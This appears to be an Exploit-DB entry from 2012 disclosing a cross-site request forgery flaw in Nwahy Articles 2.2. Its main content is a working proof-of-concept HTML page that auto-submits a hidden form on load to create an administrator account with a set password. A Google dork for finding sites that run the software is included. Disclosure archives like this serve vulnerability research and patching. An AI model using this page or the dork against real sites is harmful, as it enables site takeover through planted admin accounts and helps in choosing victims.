Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)

EDB-ID:

19927

CVE:



Author:

DaOne

Type:

webapps


Platform:

PHP

Date:

2012-07-18


##########################################
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Date: 18-7-2012
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################

[#] ~[ Exploit ]~

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>

##########################################